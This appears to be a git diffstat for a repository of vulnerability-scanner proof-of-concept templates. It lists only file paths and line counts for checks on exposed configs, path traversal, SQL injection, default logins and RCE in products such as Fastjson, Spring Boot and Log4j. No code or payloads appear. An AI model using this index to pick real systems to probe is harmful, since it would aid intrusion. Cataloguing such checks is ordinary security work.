poc/detect/wamp-xdebug-detect-11103.yaml | 21 +- poc/detect/wamp-xdebug-detect-11104.yaml | 16 + .../weave-scope-dashboard-detect-11118.yaml | 1 - poc/detect/web-ftp-detect-11136.yaml | 28 - poc/detect/web-ftp-detect-11137.yaml | 43 +- poc/detect/web-suite-detect-11168.yaml | 36 + poc/detect/web-suite-detect.yaml | 31 - poc/detect/weblogic-iiop-detect-11148.yaml | 4 - poc/detect/weblogic-t3-detect-11151.yaml | 23 +- ...152.yaml => weblogic-t3-detect-11153.yaml} | 0 .../werkzeug-debugger-detect-11198.yaml | 5 +- poc/detect/whm-login-detect.yaml | 22 +- poc/detect/wondercms-detect-11222.yaml | 24 + poc/detect/wondercms-detect.yaml | 21 - ...11261.yaml => wordpress-detect-11260.yaml} | 0 poc/detect/wordpress-detect.yaml | 57 +- poc/detect/wordpress-gotmls-detect-11280.yaml | 30 - poc/detect/wordpress-gotmls-detect.yaml | 20 +- .../wordpress-plugins-detect-11298.yaml | 8 +- poc/detect/wordpress-plugins-detect.yaml | 30 +- poc/detect/wordpress-themes-detect.yaml | 22 +- poc/detect/worksites-detection-11384.yaml | 14 - poc/detect/worksites-detection-11385.yaml | 6 +- poc/detect/wowza-streaming-detect.yaml | 20 - poc/detect/wp-xmlrpc-pingback-detection.yaml | 11 +- poc/detect/wso2-apimanager-detect-11638.yaml | 19 - poc/detect/wuzhicms-detect-11653.yaml | 11 +- poc/detect/wuzhicms-detect-11654.yaml | 30 + poc/detect/wuzhicms-detect.yaml | 24 + poc/detect/yourls-detect.yaml | 48 + ...ct-11787.yaml => zentao-detect-11785.yaml} | 0 poc/detect/zentao-detect.yaml | 17 +- .../digitalrebar-traversal-6996.yaml | 16 +- .../digitalrebar-traversal-6997.yaml | 16 +- .../directory-traversal.yaml | 3 - ...ingframework-directory-traversal-7175.yaml | 32 - ...y-springframework-directory-traversal.yaml | 21 + .../elfinder-path-traversal-7203.yaml | 37 - ...rsal.yaml => elfinder-path-traversal.yaml} | 0 .../erp-nc-directory-traversal-7245.yaml | 12 +- .../erp-nc-directory-traversal-7248.yaml | 6 +- .../finereport-path-traversal-7476.yaml | 22 +- .../finereport-path-traversal-7478.yaml | 17 +- .../kingdee-eas-directory-traversal-8489.yaml | 9 +- .../kingdee-eas-directory-traversal.yaml | 36 - ...yaml => natshell-path-traversal-9006.yaml} | 0 .../natshell-path-traversal-9008.yaml | 13 +- .../oa-tongda-path-traversal-9178.yaml | 33 - .../oa-tongda-path-traversal-9179.yaml | 34 - .../oa-tongda-path-traversal.yaml | 6 +- .../pmb-directory-traversal-9614.yaml | 25 +- .../pmb-directory-traversal.yaml | 22 + ... => tpshop-directory-traversal-10821.yaml} | 0 .../tpshop-directory-traversal.yaml | 27 + ....yaml => wooyun-path-traversal-11230.yaml} | 0 .../wooyun-path-traversal-11232.yaml | 27 - poc/docker/amazon-docker-config-280.yaml | 28 - .../amazon-docker-config-disclosure-278.yaml | 18 - .../amazon-docker-config-disclosure.yaml | 12 +- poc/docker/amazon-docker-config.yaml | 18 + .../aws-ecs-container-agent-tasks-641.yaml | 25 - poc/docker/docker-compose-config-7059.yaml | 27 - poc/docker/docker-compose-config.yaml | 26 + poc/docker/docker-registry-7064.yaml | 4 +- poc/docker/docker-registry-7067.yaml | 20 +- poc/docker/docker-registry-7068.yaml | 20 - poc/docker/dockercfg-config-7056.yaml | 6 - poc/docker/dockercfg-config.yaml | 26 - .../dockerfile-hidden-disclosure-7061.yaml | 26 + .../dockerfile-hidden-disclosure-7063.yaml | 31 - poc/docker/dockerfile-hidden-disclosure.yaml | 7 +- poc/docker/exposed-docker-api-7299.yaml | 12 +- .../kubernetes-enterprise-manager-8528.yaml | 21 + .../kubernetes-enterprise-manager-8529.yaml | 21 - poc/docker/kubernetes-enterprise-manager.yaml | 18 +- ...ernetes-kustomization-disclosure-8532.yaml | 3 +- .../kubernetes-kustomization-disclosure.yaml | 28 - poc/docker/kubernetes-metrics-8536.yaml | 7 +- poc/docker/kubernetes-metrics.yaml | 26 - poc/docker/kubernetes-pods-8542.yaml | 26 + poc/docker/kubernetes-pods-8543.yaml | 34 - .../kubernetes-resource-report-8547.yaml | 4 - ...-unauth.yaml => kubernetes-unauth(1).yaml} | 0 poc/docker/kubernetes-version-8551.yaml | 13 +- ...sion.yaml => kubernetes-version-8552.yaml} | 0 ...02.yaml => misconfigured-docker-8900.yaml} | 0 poc/docker/misconfigured-docker.yaml | 10 +- poc/drupal/drupal-install-7105.yaml | 19 - poc/drupal/drupal-install-7106.yaml | 11 +- poc/drupal/drupal-user-enum-ajax-7111.yaml | 40 - poc/drupal/drupal-user-enum-ajax.yaml | 13 +- .../drupal-user-enum-redirect-7115.yaml | 21 +- poc/elk/elasticsearch-7194.yaml | 20 +- .../elasticsearch-sql-client-detect-7190.yaml | 21 + .../elasticsearch-sql-client-detect-7192.yaml | 4 +- poc/elk/exposed-kibana-7319.yaml | 17 +- poc/elk/exposed-kibana-7320.yaml | 14 +- ...tect-8484.yaml => kibana-detect-8483.yaml} | 0 poc/elk/kibana-panel-8485.yaml | 22 + poc/elk/kibana-panel-8486.yaml | 38 - poc/elk/kibana-panel.yaml | 43 +- poc/exposed/active-admin-exposure-41.yaml | 7 + poc/exposed/active-admin-exposure-42.yaml | 18 - poc/exposed/active-admin-exposure-43.yaml | 18 + .../adobe-connect-username-exposure-100.yaml | 27 - .../adobe-connect-username-exposure-101.yaml | 52 +- .../adobe-connect-username-exposure-98.yaml | 3 +- .../airflow-configuration-exposure-230.yaml | 28 + .../airflow-configuration-exposure.yaml | 16 - .../amazon-docker-config-disclosure-278.yaml | 18 - .../amazon-docker-config-disclosure.yaml | 12 +- ...> android-debug-database-exposed-314.yaml} | 0 .../android-debug-database-exposed-315.yaml | 47 +- .../ansible-config-disclosure-326.yaml | 28 + poc/exposed/ansible-config-disclosure.yaml | 16 - poc/exposed/ansible-tower-exposure.yaml | 13 +- poc/exposed/appspec-yml-disclosure-527.yaml | 20 +- poc/exposed/appspec-yml-disclosure-528.yaml | 3 +- poc/exposed/appspec-yml-disclosure-529.yaml | 28 + poc/exposed/avtech-dvr-exposure-614.yaml | 16 +- poc/exposed/avtech-dvr-exposure-617.yaml | 16 +- .../axiom-digitalocean-key-exposure-666.yaml | 8 +- ...l => axiom-digitalocean-key-exposure.yaml} | 0 .../beward-ipcamera-disclosure-715.yaml | 34 + .../beward-ipcamera-disclosure-716.yaml | 26 +- .../beward-ipcamera-disclosure-717.yaml | 8 +- ... => caucho-resin-info-disclosure-871.yaml} | 0 .../caucho-resin-info-disclosure-872.yaml | 15 +- poc/exposed/cisco-meraki-exposure-944.yaml | 25 + poc/exposed/cisco-meraki-exposure-946.yaml | 26 - poc/exposed/cisco-smi-exposure-970.yaml | 14 +- ...e-972.yaml => cisco-smi-exposure-971.yaml} | 0 .../clockwork-dashboard-exposure-1015.yaml | 31 + .../commax-credentials-disclosure-1158.yaml | 7 +- .../commax-credentials-disclosure-1160.yaml | 36 + poc/exposed/couchdb-exposure-1238.yaml | 25 - poc/exposed/couchdb-exposure-1239.yaml | 24 + poc/exposed/couchdb-exposure-1241.yaml | 6 +- poc/exposed/credential-exposure-1249.yaml | 7 +- poc/exposed/credentials-disclosure-1255.yaml | 4152 +- poc/exposed/credentials-disclosure-1256.yaml | 708 + poc/exposed/django-debug-exposed-404.yaml | 24 + poc/exposed/django-debug-exposure.yaml | 23 +- .../dockerfile-hidden-disclosure-7061.yaml | 26 + .../dockerfile-hidden-disclosure-7063.yaml | 31 - poc/exposed/dockerfile-hidden-disclosure.yaml | 7 +- poc/exposed/druid-console-exposure-7092.yaml | 16 - poc/exposed/druid-console-exposure.yaml | 2 +- poc/exposed/exposed-adb-7280.yaml | 7 +- poc/exposed/exposed-adb-7281.yaml | 15 +- poc/exposed/exposed-adb-7282.yaml | 22 + poc/exposed/exposed-alps-spring-7283.yaml | 30 + poc/exposed/exposed-bitkeeper-7292.yaml | 28 + ...arcs-7298.yaml => exposed-darcs-7297.yaml} | 0 poc/exposed/exposed-docker-api-7299.yaml | 12 +- poc/exposed/exposed-docker-api-7301.yaml | 29 + poc/exposed/exposed-gitignore-7303.yaml | 40 - poc/exposed/exposed-gitignore-7306.yaml | 19 +- poc/exposed/exposed-glances-api-7308.yaml | 56 +- poc/exposed/exposed-hg-7312.yaml | 33 + .../exposed-jquery-file-upload-7313.yaml | 25 +- poc/exposed/exposed-jquery-file-upload.yaml | 22 - poc/exposed/exposed-kafdrop-7318.yaml | 19 + poc/exposed/exposed-kafdrop.yaml | 9 +- poc/exposed/exposed-kibana-7319.yaml | 17 +- poc/exposed/exposed-kibana-7320.yaml | 14 +- poc/exposed/exposed-mysql-initial-7323.yaml | 17 +- poc/exposed/exposed-mysql-initial-7324.yaml | 9 +- poc/exposed/exposed-nomad-7328.yaml | 31 - poc/exposed/exposed-nomad-7330.yaml | 30 - poc/exposed/exposed-nomad.yaml | 10 +- poc/exposed/exposed-redis-7339.yaml | 27 + poc/exposed/exposed-redis.yaml | 24 +- poc/exposed/exposed-service-now.yaml | 16 +- poc/exposed/exposed-sharepoint-list-7345.yaml | 28 - poc/exposed/exposed-sharepoint-list-7347.yaml | 8 +- poc/exposed/exposed-sqlite-manager-7349.yaml | 3 +- poc/exposed/exposed-sqlite-manager.yaml | 18 +- poc/exposed/exposed-svn-7351.yaml | 23 + poc/exposed/exposed-svn-7354.yaml | 27 +- poc/exposed/exposed-vscode-7357.yaml | 27 - poc/exposed/exposed-vscode.yaml | 18 + poc/exposed/exposed-webalizer-7358.yaml | 18 + poc/exposed/exposed-webalizer-7360.yaml | 18 - poc/exposed/exposed-zookeeper-7365.yaml | 18 - poc/exposed/exposed-zookeeper.yaml | 19 +- .../fanruanoa2012-disclosure-7389.yaml | 41 + poc/exposed/fanruanoa2012-disclosure.yaml | 31 - poc/exposed/firebase-config-exposure.yaml | 30 - poc/exposed/flink-exposure-7509.yaml | 17 - poc/exposed/flink-exposure-7511.yaml | 17 + poc/exposed/flink-exposure.yaml | 19 +- .../ftp-credentials-exposure-7568.yaml | 37 - poc/exposed/ftp-credentials-exposure.yaml | 22 + .../git-credentials-disclosure-7641.yaml | 32 + ...0.yaml => git-credentials-disclosure.yaml} | 0 .../github-workflows-disclosure-7664.yaml | 44 + .../github-workflows-disclosure-7665.yaml | 8 +- .../github-workflows-disclosure-7666.yaml | 51 - poc/exposed/github-workflows-disclosure.yaml | 10 +- .../glpi-telemetry-disclosure-7739.yaml | 25 - poc/exposed/glpi-telemetry-disclosure.yaml | 50 +- poc/exposed/gogs-install-exposure-7755.yaml | 21 + poc/exposed/hadoop-exposure-7874.yaml | 4 +- poc/exposed/hadoop-exposure.yaml | 20 +- .../hp-ilo-serial-key-disclosure-8023.yaml | 24 - .../hp-ilo-serial-key-disclosure-8025.yaml | 27 + poc/exposed/hp-ilo-serial-key-disclosure.yaml | 7 +- poc/exposed/ibm-friendly-path-exposure.yaml | 3 +- poc/exposed/iotawatt-app-exposure-8187.yaml | 21 +- poc/exposed/java-melody-exposed-8223.yaml | 6 +- .../jfrog-unauth-build-exposed-8299.yaml | 30 + .../jfrog-unauth-build-exposed-8302.yaml | 8 +- poc/exposed/jolokia-info-disclosure-8358.yaml | 73 - poc/exposed/jolokia-info-disclosure-8359.yaml | 71 + poc/exposed/jolokia-info-disclosure.yaml | 9 +- ...ernetes-kustomization-disclosure-8532.yaml | 3 +- .../kubernetes-kustomization-disclosure.yaml | 28 - poc/exposed/lvmeng-uts-disclosure-8680.yaml | 29 - poc/exposed/lvmeng-uts-disclosure.yaml | 8 +- poc/exposed/magento-2-exposed-api-8687.yaml | 5 +- poc/exposed/magento-2-exposed-api-8688.yaml | 45 + poc/exposed/magento-config-disclosure.yaml | 50 - poc/exposed/monitorix-exposure-8929.yaml | 23 +- poc/exposed/netgear-router-exposure-9031.yaml | 20 +- poc/exposed/netgear-router-exposure.yaml | 42 + poc/exposed/opcache-status-exposure-9254.yaml | 21 +- poc/exposed/opcache-status-exposure-9255.yaml | 19 +- .../oracle-ebs-sqllog-disclosure-9369.yaml | 26 - .../oracle-ebs-sqllog-disclosure-9370.yaml | 18 +- poc/exposed/pgadmin-exposure-9490.yaml | 27 - poc/exposed/pgadmin-exposure-9491.yaml | 26 + poc/exposed/pgadmin-exposure.yaml | 15 +- poc/exposed/php-user-ini-disclosure-9561.yaml | 7 +- ...ml => pmb-local-file-disclosure-9619.yaml} | 0 poc/exposed/pmb-local-file-disclosure.yaml | 19 + .../prometheus-exposed-panel-9681.yaml | 14 - .../prometheus-exposed-panel-9683.yaml | 6 +- ...=> putty-private-key-disclosure-9730.yaml} | 0 poc/exposed/pyproject-disclosure-9736.yaml | 7 +- poc/exposed/pyproject-disclosure-9737.yaml | 22 - poc/exposed/pyproject-disclosure-9738.yaml | 26 + poc/exposed/qihang-media-disclosure-9764.yaml | 25 + poc/exposed/qihang-media-disclosure.yaml | 20 + .../rails-secret-token-disclosure-9809.yaml | 22 - .../rails-secret-token-disclosure-9810.yaml | 23 + .../rails-secret-token-disclosure.yaml | 3 +- ...aml => roundcube-log-disclosure-9907.yaml} | 0 poc/exposed/roundcube-log-disclosure.yaml | 45 +- .../ruijie-information-disclosure-9931.yaml | 21 + .../ruijie-information-disclosure-9932.yaml | 21 +- poc/exposed/selenium-exposure-10137.yaml | 32 + poc/exposed/selenium-exposure-10138.yaml | 30 - poc/exposed/selenium-exposure.yaml | 12 +- .../sensitive-storage-exposure-10143.yaml | 3 +- poc/exposed/sensitive-storage-exposure.yaml | 30 - poc/exposed/setup-page-exposure-10181.yaml | 19 - poc/exposed/setup-page-exposure.yaml | 3 - .../snyk-ignore-file-disclosure-10347.yaml | 21 + .../snyk-ignore-file-disclosure-10349.yaml | 24 - poc/exposed/snyk-ignore-file-disclosure.yaml | 7 +- poc/exposed/solr-exposure-10363.yaml | 12 +- poc/exposed/solr-exposure-10364.yaml | 24 + poc/exposed/solr-exposure-10366.yaml | 24 - ...kphp-509-information-disclosure-10755.yaml | 29 - .../thinkphp-509-information-disclosure.yaml | 14 +- poc/exposed/thumbs-db-disclosure-10761.yaml | 10 +- ...e.yaml => thumbs-db-disclosure-10763.yaml} | 0 .../tugboat-config-exposure-10842.yaml | 32 - ...aml => tugboat-config-exposure-10843.yaml} | 0 ...tchguard-credentials-disclosure-11107.yaml | 16 +- ...=> watchguard-credentials-disclosure.yaml} | 0 ...press-wpcourses-info-disclosure-11369.yaml | 34 + ...press-wpcourses-info-disclosure-11371.yaml | 36 - .../wordpress-wpcourses-info-disclosure.yaml | 13 +- .../wp-full-path-disclosure-11455.yaml | 16 + .../wp-full-path-disclosure-11457.yaml | 18 - poc/exposed/wp-full-path-disclosure.yaml | 9 +- .../wp-mailchimp-log-exposure-11494.yaml | 2 +- ....yaml => yarn-manager-exposure-11731.yaml} | 0 poc/exposed/yarn-manager-exposure.yaml | 14 +- .../zenphoto-installation-sensitive-info.yaml | 33 - .../zenphoto-sensitive-info-11784.yaml | 28 + poc/exposed/zenphoto-sensitive-info.yaml | 12 +- poc/extract/extract-urls-7368.yaml | 6 +- poc/extract/extract-urls-7370.yaml | 24 + poc/favicon/favicon-detection-7441.yaml | 2026 - poc/favicon/favicon-detection-7446.yaml | 97 +- poc/ftp/crush-ftp-detect-1271.yaml | 40 +- poc/ftp/crush-ftp-detect-1272.yaml | 21 + poc/ftp/crush-ftp-detect.yaml | 40 +- poc/ftp/crush-ftp-login-1273.yaml | 21 +- poc/ftp/crush-ftp-login-1275.yaml | 23 + poc/ftp/crush-ftp-login.yaml | 16 +- poc/ftp/crushftp-default-login.yaml | 59 + poc/ftp/ftp-credentials-exposure-7568.yaml | 37 - poc/ftp/ftp-credentials-exposure.yaml | 22 + poc/ftp/ftp-weak-credentials-7570.yaml | 43 - poc/ftp/ftp-weak-credentials.yaml | 23 +- .../{ftpconfig.yaml => ftpconfig-7565.yaml} | 0 poc/ftp/ftpconfig-7566.yaml | 13 +- poc/ftp/unauth-ftp-10939.yaml | 13 +- poc/ftp/unauth-ftp-10942.yaml | 18 - poc/ftp/vsftpd-detection-11073.yaml | 17 - poc/ftp/vsftpd-detection-11075.yaml | 31 + poc/ftp/vsftpd-detection.yaml | 4 - poc/ftp/web-ftp-detect-11136.yaml | 28 - poc/ftp/web-ftp-detect-11137.yaml | 43 +- poc/ftp/wordpress-updraftplus-pem-key.yaml | 12 +- poc/fuzz/adminer-panel-fuzz.yaml | 3 +- ...fuzzing-xss-get-params-html-injection.yaml | 8 +- poc/fuzz/lfi-linux-fuzz.yaml | 78 + poc/fuzz/linux-lfi-fuzz.yaml | 30 +- ...yaml => GCP-service-account (copy 1).yaml} | 0 poc/gcloud/gcp-service-account-11851.yaml | 16 + .../axiom-digitalocean-key-exposure-666.yaml | 8 +- ...l => axiom-digitalocean-key-exposure.yaml} | 0 poc/git/digitalrebar-traversal-6996.yaml | 16 +- poc/git/digitalrebar-traversal-6997.yaml | 16 +- poc/git/exposed-gitignore-7303.yaml | 40 - poc/git/exposed-gitignore-7306.yaml | 19 +- poc/git/git-config-7635.yaml | 14 + poc/git/git-config-7636.yaml | 19 +- ...l => git-config-nginxoffbyslash-7628.yaml} | 0 poc/git/git-config-nginxoffbyslash-7630.yaml | 35 + poc/git/git-credentials-disclosure-7641.yaml | 32 + ...0.yaml => git-credentials-disclosure.yaml} | 0 poc/git/git-mailmap.yaml | 8 +- poc/git/git-web-interface.yaml | 11 +- poc/git/gitbook-detect-7623.yaml | 32 +- poc/git/gitbook-detect-7624.yaml | 5 +- poc/git/gitbook-takeover-7627.yaml | 22 + poc/git/gitbook-takeover.yaml | 16 +- poc/git/gitea-login.yaml | 13 +- poc/git/github-enterprise-detect-7649.yaml | 19 + poc/git/github-enterprise-detect-7650.yaml | 19 +- poc/git/github-gemfile-files-7653.yaml | 36 + poc/git/github-page-config-7654.yaml | 30 + poc/git/github-workflows-disclosure-7664.yaml | 44 + poc/git/github-workflows-disclosure-7665.yaml | 8 +- poc/git/github-workflows-disclosure-7666.yaml | 51 - poc/git/github-workflows-disclosure.yaml | 10 +- poc/git/gitlab-api-user-enum-7668.yaml | 7 +- poc/git/gitlab-api-user-enum.yaml | 16 +- poc/git/gitlab-public-repos.yaml | 29 - poc/git/gitlab-public-signup-7683.yaml | 26 - poc/git/gitlab-public-snippets-7688.yaml | 9 +- poc/git/gitlab-public-snippets-7690.yaml | 9 +- poc/git/gitlab-rce-7692.yaml | 21 +- poc/git/gitlab-rce-7693.yaml | 17 +- .../gitlab-uninitialized-password-7694.yaml | 11 +- .../gitlab-uninitialized-password-7695.yaml | 10 +- poc/git/gitlab-user-enumeration-7698.yaml | 46 +- poc/git/gitlab-weak-login-7707.yaml | 12 +- poc/git/gitlab-weak-login.yaml | 56 - poc/git/metadata-digitalocean.yaml | 12 +- poc/git/wordpress-git-config-11278.yaml | 26 - poc/git/wordpress-git-config-11279.yaml | 16 +- poc/google/api-google-drive-432.yaml | 28 + poc/google/api-google-drive.yaml | 23 - poc/google/google-api-key-7768.yaml | 9 +- poc/google/google-earth-dlogin-7781.yaml | 31 + poc/google/google-earth-dlogin.yaml | 17 +- poc/google/google-floc-disabled-7785.yaml | 6 +- .../google-secrets.yaml} | 0 poc/google/google-storage-7788.yaml | 16 + poc/google/google-storage-7789.yaml | 3 +- poc/google/metadata-google-8820.yaml | 13 +- poc/google/metadata-google-8821.yaml | 18 +- poc/graphql/graphql-alias-batching-7826.yaml | 32 +- poc/graphql/graphql-alias-batching.yaml | 37 - poc/graphql/graphql-array-batching-7827.yaml | 14 +- poc/graphql/graphql-array-batching.yaml | 43 + poc/graphql/graphql-detect-7830.yaml | 158 + poc/graphql/graphql-detect-7831.yaml | 158 - .../graphql-field-suggestion-7834.yaml | 13 +- poc/graphql/graphql-get-method-7835.yaml | 6 - poc/graphql/graphql-get-method.yaml | 34 - .../hasura-graphql-psql-exec-7899.yaml | 19 +- poc/graphql/hasura-graphql-ssrf-7905.yaml | 47 + poc/graphql/hasura-graphql-ssrf.yaml | 10 +- poc/header/header-command-injection-7918.yaml | 17 +- poc/header/header-command-injection-7919.yaml | 30 + poc/header/header_blind_xss-7914.yaml | 14 +- poc/header/host-header-injection-8000.yaml | 36 - poc/header/host-header-poisoning.yaml | 89 - poc/header/hostheaderpoisoning.yaml | 34 +- .../http-missing-security-headers-8058.yaml | 170 +- poc/header/http-missing-security-headers.yaml | 115 - poc/header/log4j-header.yaml | 55 + .../oob-header-based-interaction-9249.yaml | 7 +- .../oob-header-based-interaction-9250.yaml | 43 + poc/header/oob-header-based-interaction.yaml | 44 + poc/header/sqli_header-10504.yaml | 23 - poc/http/apache-httpd-rce-362.yaml | 41 - poc/http/apache-httpd-rce.yaml | 13 +- poc/http/cl-te-http-smuggling.yaml | 37 - poc/http/default-lighttpd-page-6866.yaml | 22 - poc/http/default-lighttpd-page-6867.yaml | 5 +- ...tp-etcd-unauthenticated-api-data-leak.yaml | 36 +- .../http-missing-security-headers-8058.yaml | 170 +- poc/http/http-missing-security-headers.yaml | 115 - .../http-value-share-template-2.yaml} | 0 poc/http/httpbin-open-redirect-8049.yaml | 27 +- poc/http/httpbin-open-redirect.yaml | 23 - poc/http/httpbin-panel-8051.yaml | 26 - poc/http/httpbin-panel.yaml | 19 +- poc/http/httpbin-xss-8052.yaml | 22 +- poc/http/httpd-config-8055.yaml | 34 + poc/http/httpd-config.yaml | 24 - poc/http/ibm-http-server-8095.yaml | 9 +- poc/http/ibm-http-server.yaml | 25 - poc/http/oracle-http-server-12c-9383.yaml | 4 +- poc/http/oracle-http-server-12c-9384.yaml | 19 + poc/http/oracle-httpserver12c.yaml | 9 +- poc/http/springboot-httptrace-10469.yaml | 25 +- .../ibm-advanced-system-management-8088.yaml | 23 + .../ibm-advanced-system-management-8090.yaml | 24 - poc/ibm/ibm-advanced-system-management.yaml | 12 +- poc/ibm/ibm-friendly-path-exposure.yaml | 3 +- poc/ibm/ibm-http-server-8095.yaml | 9 +- poc/ibm/ibm-http-server.yaml | 25 - ...gin-8110.yaml => ibm-note-login-8112.yaml} | 0 poc/ibm/ibm-security-access-manager-8113.yaml | 3 +- poc/ibm/ibm-service-assistant-8118.yaml | 24 - poc/ibm/ibm-service-assistant.yaml | 20 +- .../ibm-storage-default-credential-8124.yaml | 12 +- .../ibm-storage-default-credential-8125.yaml | 21 +- poc/injection/GLPI-9.3.3-SQL-Injection.yaml | 19 +- .../buffalo-config-injection-798.yaml | 30 - .../buffalo-config-injection-800.yaml | 34 + .../buffalo-config-injection-801.yaml | 39 + poc/injection/buffalo-config-injection.yaml | 6 +- poc/injection/crlf-injection-1262.yaml | 29 + poc/injection/crlf-injection-1263.yaml | 6 +- poc/injection/crlf-injection-1264.yaml | 51 +- .../duomicms-sql-injection-7124.yaml | 27 + poc/injection/duomicms-sql-injection.yaml | 22 + ...fuzzing-xss-get-params-html-injection.yaml | 8 +- poc/injection/glpi-9.3.3-sql-injection.yaml | 25 + .../header-command-injection-7918.yaml | 17 +- .../header-command-injection-7919.yaml | 30 + poc/injection/host-header-injection-8000.yaml | 36 - .../simple-crm-sql-injection-10275.yaml | 18 +- .../simple-crm-sql-injection-10277.yaml | 12 +- poc/injection/sql-injection.yaml | 94 +- poc/injection/weiphp-sql-injection-11190.yaml | 11 +- poc/java/default-jetty-page-6862.yaml | 17 + poc/java/default-jetty-page-6863.yaml | 3 +- ...ingframework-directory-traversal-7175.yaml | 32 - ...y-springframework-directory-traversal.yaml | 21 + poc/java/exposed-alps-spring-7283.yaml | 30 + poc/java/java-melody-exposed-8223.yaml | 6 +- poc/java/java-rmi-detect-8227.yaml | 17 + poc/java/java-rmi-detect.yaml | 17 +- poc/java/jboss-detect-8237.yaml | 34 + poc/java/jboss-detect.yaml | 22 - poc/java/jetty-showcontexts-enable-8297.yaml | 24 - poc/java/jinfornet-jreport-lfi-8307.yaml | 19 + poc/java/jinfornet-jreport-lfi-8308.yaml | 23 - poc/java/jinfornet-jreport-lfi.yaml | 6 +- poc/java/jsf-detection-8397.yaml | 19 - poc/java/jsf-detection-8398.yaml | 31 + poc/java/jsf-detection.yaml | 31 +- poc/java/public-tomcat-manager-9708.yaml | 21 - poc/java/public-tomcat-manager-9710.yaml | 11 +- poc/java/shiro-detect-10195.yaml | 11 +- poc/java/shiro-detect-10196.yaml | 19 - .../spring-framework-exceptions-10493.yaml | 28 - poc/java/spring-framework-exceptions.yaml | 24 + poc/java/springForShell-CVE-2022-22963.yaml | 36 + poc/java/springboot-actuator-10433.yaml | 24 +- poc/java/springboot-actuator-10435.yaml | 34 - ...pringboot-actuators-jolokia-xxe-10430.yaml | 28 + ...pringboot-actuators-jolokia-xxe-10431.yaml | 31 - poc/java/springboot-autoconfig.yaml | 25 - poc/java/springboot-beans-10441.yaml | 2 +- poc/java/springboot-configprops-10442.yaml | 42 + poc/java/springboot-env-10449.yaml | 13 +- poc/java/springboot-env-10450.yaml | 41 + poc/java/springboot-env-10451.yaml | 34 +- poc/java/springboot-h2-db-rce-10455.yaml | 2 +- ...e-10457.yaml => springboot-h2-db-rce.yaml} | 0 poc/java/springboot-health-10459.yaml | 38 + poc/java/springboot-health.yaml | 25 - poc/java/springboot-heapdump-10463.yaml | 29 - poc/java/springboot-httptrace-10469.yaml | 25 +- poc/java/springboot-info-10470.yaml | 9 +- poc/java/springboot-info.yaml | 31 + poc/java/springboot-loggers-10475.yaml | 13 +- poc/java/springboot-loggers-10476.yaml | 30 - poc/java/springboot-loggers-10477.yaml | 29 + poc/java/springboot-mappings-10478.yaml | 31 + poc/java/springboot-mappings-10481.yaml | 31 - poc/java/springboot-mappings.yaml | 4 +- poc/java/springboot-metrics-10483.yaml | 14 +- poc/java/springboot-threaddump-10484.yaml | 26 +- poc/java/springboot-threaddump-10486.yaml | 34 - poc/java/springboot-trace.yaml | 31 - poc/java/struts-debug-mode.yaml | 11 +- poc/java/struts-problem-report-10563.yaml | 20 - poc/java/struts-problem-report-10564.yaml | 19 + poc/java/struts-problem-report.yaml | 3 +- poc/java/tomcat-default-login-10791.yaml | 2 +- poc/java/tomcat-default-login.yaml | 76 + poc/java/tomcat-detect-10793.yaml | 4 +- poc/java/tomcat-detect.yaml | 21 +- poc/java/tomcat-pathnormalization.yaml | 28 - poc/java/tomcat-scripts-10803.yaml | 33 +- poc/java/weblogic-iiop-detect-11148.yaml | 4 - poc/java/weblogic-t3-detect-11151.yaml | 23 +- ...152.yaml => weblogic-t3-detect-11153.yaml} | 0 poc/java/weblogic-weak-login-11154.yaml | 68 - poc/java/weblogic-weak-login-11155.yaml | 14 +- ...webview-addjavascript-interface-11175.yaml | 5 +- ...ebview-addjavascript-interface-11176.yaml} | 0 poc/java/webview-javascript.yaml | 11 +- ...el-11211.yaml => wildfly-panel-11209.yaml} | 0 poc/java/wildfly-panel.yaml | 16 +- .../aem-querybuilder-json-servlet-182.yaml | 72 +- poc/javascript/bower-json-769.yaml | 39 - poc/javascript/bower-json.yaml | 31 + poc/javascript/fastjson-1-2-24-rce-7400.yaml | 21 +- poc/javascript/fastjson-1-2-24-rce.yaml | 46 - poc/javascript/fastjson-1-2-41-rce-7403.yaml | 17 +- poc/javascript/fastjson-1-2-41-rce.yaml | 31 + poc/javascript/fastjson-1-2-42-rce-7407.yaml | 17 +- ...rce.yaml => fastjson-1-2-42-rce-7408.yaml} | 0 poc/javascript/fastjson-1-2-43-rce-7411.yaml | 17 +- poc/javascript/fastjson-1-2-43-rce-7412.yaml | 44 + poc/javascript/fastjson-1-2-47-rce-7415.yaml | 19 +- poc/javascript/fastjson-1-2-47-rce-7416.yaml | 9 +- poc/javascript/fastjson-1-2-62-rce-7419.yaml | 43 + poc/javascript/fastjson-1-2-67-rce-7424.yaml | 17 +- poc/javascript/jsf-detection-8397.yaml | 19 - poc/javascript/jsf-detection-8398.yaml | 31 + poc/javascript/jsf-detection.yaml | 31 +- poc/javascript/jsherp-boot-panel.yaml | 31 - ...json-8472.yaml => keycloak-json-8473.yaml} | 0 poc/javascript/keycloak-json-8474.yaml | 5 +- poc/javascript/package-json-9421.yaml | 41 + poc/javascript/package-json.yaml | 26 - ...webview-addjavascript-interface-11175.yaml | 5 +- ...ebview-addjavascript-interface-11176.yaml} | 0 poc/javascript/webview-javascript.yaml | 11 +- poc/jenkins/jenkins-default-8270.yaml | 10 +- ...default.yaml => jenkins-default-8272.yaml} | 0 poc/jenkins/jenkins-detect-8275.yaml | 27 - poc/jenkins/jenkins-detect-8276.yaml | 34 + poc/jenkins/jenkins-login-8277.yaml | 27 - poc/jenkins/jenkins-login-8280.yaml | 18 + poc/jenkins/jenkins-script-8284.yaml | 46 - poc/jenkins/jenkins-script.yaml | 35 + poc/jenkins/jenkins-stack-trace-8285.yaml | 27 + poc/jenkins/jenkins-stack-trace-8287.yaml | 3 +- poc/jenkins/unauthenticated-jenkins.yaml | 50 +- poc/joomla/joomla-com-fabrik-lfi-8370.yaml | 16 +- ...i-8371.yaml => joomla-com-fabrik-lfi.yaml} | 0 poc/joomla/joomla-config-file-8376.yaml | 10 +- poc/joomla/joomla-config-file-8377.yaml | 12 +- poc/joomla/joomla-file-listing-8380.yaml | 36 + poc/joomla/joomla-file-listing.yaml | 22 - poc/joomla/joomla-htaccess-8381.yaml | 9 +- poc/joomla/joomla-manifest-file-8386.yaml | 17 +- poc/joomla/joomla-manifest-file-8388.yaml | 14 +- poc/joomla/joomla-panel-8389.yaml | 16 + poc/joomla/joomla-panel-8391.yaml | 18 - poc/joomla/joomla-panel.yaml | 9 +- poc/joomla/joomla-workflow-8394.yaml | 2 +- poc/joomla/joomla-workflow.yaml | 13 - poc/joomla/rusty-joomla-9955.yaml | 24 +- poc/joomla/rusty-joomla.yaml | 38 